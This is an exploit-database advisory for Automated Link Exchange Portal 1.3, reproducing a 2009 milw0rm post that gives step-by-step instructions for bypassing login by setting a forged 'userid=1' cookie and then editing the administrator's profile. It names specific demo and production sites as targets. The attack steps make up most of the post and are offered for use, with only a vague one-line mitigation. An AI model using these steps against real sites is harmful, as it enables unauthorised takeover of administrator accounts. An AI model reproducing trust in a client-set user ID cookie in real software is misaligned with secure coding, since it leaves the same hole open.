Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities

vendor:

Automated Link Exchange Portal

by:

TiGeR-Dz

8,8

CVSS

HIGH

Cookie Handling + Bypass Login + Change Profile

352

CWE

Product Name: Automated Link Exchange Portal

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:cmsnx:automated_link_exchange_portal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities

A vulnerability in Automated Link Exchange Portal Version 1.3 allows an attacker to bypass the login and change the profile of the admin by entering a cookie (javascript:document.cookie="userid=1;path=/";) and going to the login page (http://www.site.com/[path]/user.mainpage.php) and then changing the profile at http://www.site.com/[path]/user.edit.account.php

Mitigation:

Ensure that the application is properly configured to prevent unauthorized access to the admin profile.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download:http://www.cmsnx.com/product.demo.php?id=11
 alf mabroke bfowze al montakhabe alwatany :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note:Follow these steps
 
 after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go 
 to login http://www.site.com/[path]/user.mainpage.php and change profile admin at 
  http://www.site.com/[path]/user.edit.account.php 

 exploit= cookie handling + Bypass login + change profile :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php 

----------------------------------------------------------
 Dem0
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]